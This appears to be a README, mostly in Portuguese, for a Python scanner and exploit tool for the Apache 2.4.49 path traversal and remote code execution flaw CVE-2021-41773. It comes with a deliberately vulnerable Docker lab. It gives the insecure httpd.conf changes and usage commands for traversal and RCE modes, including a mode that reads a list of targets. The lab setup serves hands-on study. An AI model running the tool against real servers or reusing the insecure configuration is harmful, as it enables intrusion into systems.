
cve-2021-41773.py is a python script that will help in finding Path Traversal or Remote Code Execution vulnerability in Apache 2.4.49
cve-2021-41773.py é um script Python que ajudará a encontrar vulnerabilidade de Travessia de Caminho ou Execução Remota de Código no Apache 2.4.49. Uma instância vulnerável do Docker é fornecida para colocar a mão na massa no CVE-2021-41773
Se o CGI-BIN estiver habilitado, podemos realizar Execução Remota de Código, mas não Travessia de Caminho, então o diretório "icons" foi adicionado na seção Alias no httpd.conf para verificar a vulnerabilidade de Travessia de Caminho.
1. Habilitar CGI-BIN
2. Adicionar diretório "icons" na seção Alias
3. <Directory>Require all granted</Directory>
$ docker build -t cve-2021-41773 .
$ docker run -it cve-2021-41773
$ python3 cve-2021-41773.py -u http://172.17.0.2
$ python3 cve-2021-41773.py -u http://172.17.0.2 -pt
$ python3 cve-2021-41773.py -u http://172.17.0.2 -rce
$ python3 cve-2021-41773.py -l list.txt
$ python3 cve-2021-41773.py -l list.txt -pt
$ python3 cve-2021-41773.py -l list.txt -rce
Mais informações podem ser encontradas aqui.